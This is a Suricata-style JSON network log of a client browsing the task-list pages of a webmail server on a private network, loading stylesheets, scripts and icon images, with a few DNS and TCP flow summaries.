{"timestamp":"2020-02-29T00:21:17.425113+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8360},"app_proto":"http","fileinfo":{"filename":"\/nag\/","state":"CLOSED","stored":false,"size":37397,"tx_id":1}} {"timestamp":"2020-02-29T00:21:17.440353+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":813}} {"timestamp":"2020-02-29T00:21:17.442545+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":813},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":2235,"tx_id":2}} {"timestamp":"2020-02-29T00:21:17.442807+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/quickfinder.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1159}} {"timestamp":"2020-02-29T00:21:17.459364+0000","flow_id":610635607832318,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52940,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/sidebar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":744}} {"timestamp":"2020-02-29T00:21:17.460875+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52942,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/redbox.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1275}} {"timestamp":"2020-02-29T00:21:17.462601+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/quickfinder.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1159},"app_proto":"http","fileinfo":{"filename":"\/js\/quickfinder.js","state":"CLOSED","stored":false,"size":3277,"tx_id":3}} {"timestamp":"2020-02-29T00:21:17.462956+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/tables.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2119}} {"timestamp":"2020-02-29T00:21:17.567336+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52942,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/redbox.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1275},"app_proto":"http","fileinfo":{"filename":"\/js\/redbox.js","state":"CLOSED","stored":false,"size":4234,"tx_id":0}} {"timestamp":"2020-02-29T00:21:17.567589+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52942,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74}} {"timestamp":"2020-02-29T00:21:17.569331+0000","flow_id":610635607832318,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52940,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/sidebar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":744},"app_proto":"http","fileinfo":{"filename":"\/js\/sidebar.js","state":"CLOSED","stored":false,"size":1978,"tx_id":0}} {"timestamp":"2020-02-29T00:21:17.569674+0000","flow_id":610635607832318,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52940,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/az.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":264}} {"timestamp":"2020-02-29T00:21:17.570872+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52942,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tablehead-bg.png","state":"CLOSED","stored":false,"size":74,"tx_id":1}} {"timestamp":"2020-02-29T00:21:17.572992+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/tables.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2119},"app_proto":"http","fileinfo":{"filename":"\/js\/tables.js","state":"CLOSED","stored":false,"size":6954,"tx_id":4}} {"timestamp":"2020-02-29T00:21:17.581785+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tab.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":108}} {"timestamp":"2020-02-29T00:21:17.583865+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tab.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":108},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tab.png","state":"CLOSED","stored":false,"size":108,"tx_id":5}} {"timestamp":"2020-02-29T00:21:17.587547+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/add.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":512}} {"timestamp":"2020-02-29T00:21:17.587865+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52942,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":89}} {"timestamp":"2020-02-29T00:21:17.591276+0000","flow_id":103172336909697,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52944,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/data.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":386}} {"timestamp":"2020-02-29T00:21:17.588965+0000","flow_id":610635607832318,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52940,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/az.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":264},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/az.png","state":"CLOSED","stored":false,"size":264,"tx_id":1}} {"timestamp":"2020-02-29T00:21:17.589306+0000","flow_id":610635607832318,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52940,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/nag.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":465}} {"timestamp":"2020-02-29T00:21:17.591842+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52942,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tablehead-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":89},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tablehead-split.png","state":"CLOSED","stored":false,"size":89,"tx_id":2}} {"timestamp":"2020-02-29T00:21:17.592157+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52942,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113}} {"timestamp":"2020-02-29T00:21:17.596746+0000","flow_id":103172336909697,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52944,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/data.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":386},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/data.png","state":"CLOSED","stored":false,"size":386,"tx_id":0}} {"timestamp":"2020-02-29T00:21:17.593362+0000","flow_id":1543210446686322,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52946,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/edit-sidebar-fff.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":220}} {"timestamp":"2020-02-29T00:21:17.594219+0000","flow_id":1543210446686322,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52946,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/edit-sidebar-fff.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":220},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/edit-sidebar-fff.png","state":"CLOSED","stored":false,"size":220,"tx_id":0}} {"timestamp":"2020-02-29T00:21:17.594991+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52942,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-active-bg.png","state":"CLOSED","stored":false,"size":113,"tx_id":3}} {"timestamp":"2020-02-29T00:21:17.595102+0000","flow_id":1543210446686322,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52946,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477}} {"timestamp":"2020-02-29T00:21:17.595491+0000","flow_id":1543210446686322,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52946,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/checkbox_on.png","state":"CLOSED","stored":false,"size":477,"tx_id":1}} {"timestamp":"2020-02-29T00:21:17.595752+0000","flow_id":610635607832318,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52940,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/nag.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":465},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/graphics\/nag.png","state":"CLOSED","stored":false,"size":465,"tx_id":2}} {"timestamp":"2020-02-29T00:21:17.596037+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52942,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/collapse.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227}} {"timestamp":"2020-02-29T00:21:17.597188+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52942,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/collapse.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/collapse.png","state":"CLOSED","stored":false,"size":227,"tx_id":4}} {"timestamp":"2020-02-29T00:21:17.599969+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/add.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":512},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/graphics\/add.png","state":"CLOSED","stored":false,"size":512,"tx_id":6}} {"timestamp":"2020-02-29T00:21:17.616058+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87}} {"timestamp":"2020-02-29T00:21:17.617498+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52938,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-split.png","state":"CLOSED","stored":false,"size":87,"tx_id":7}} {"timestamp":"2020-02-29T00:21:17.617787+0000","flow_id":24883672652726,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} {"timestamp":"2020-02-29T00:21:17.641243+0000","flow_id":103172336909697,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52944,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/plus-sidebar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":515}} {"timestamp":"2020-02-29T00:21:17.641296+0000","flow_id":610635607832318,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52940,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/search.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":460}} {"timestamp":"2020-02-29T00:21:17.641307+0000","flow_id":1543210446686322,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52946,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/expand.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234}} {"timestamp":"2020-02-29T00:21:17.641313+0000","flow_id":764176393698498,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52942,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87}} {"timestamp":"2020-02-29T00:21:18.000736+0000","flow_id":826028198060941,"event_type":"flow","src_ip":"192.168.10.122","src_port":59430,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:16:17.582541+0000","end":"2020-02-29T00:16:17.690881+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:21.000858+0000","flow_id":553916250233715,"event_type":"flow","src_ip":"192.168.10.122","src_port":57167,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:16:20.105331+0000","end":"2020-02-29T00:16:20.214280+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:21:22.000726+0000","flow_id":345374128613512,"event_type":"flow","src_ip":"192.168.10.81","src_port":52926,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1903,"bytes_toclient":3289,"start":"2020-02-29T00:20:16.927880+0000","end":"2020-02-29T00:20:21.988124+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:21:22.598751+0000","flow_id":610635607832318,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52940,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/search.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/nag\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":460},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/graphics\/search.png","state":"CLOSED","stored":false,"size":460,"tx_id":3}} {"timestamp":"2020-02-29T00:21:22.600626+0000","flow_id":1543210446686322,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52946,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/expand.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/expand.png","state":"CLOSED","stored":false,"size":234,"tx_id":2}} 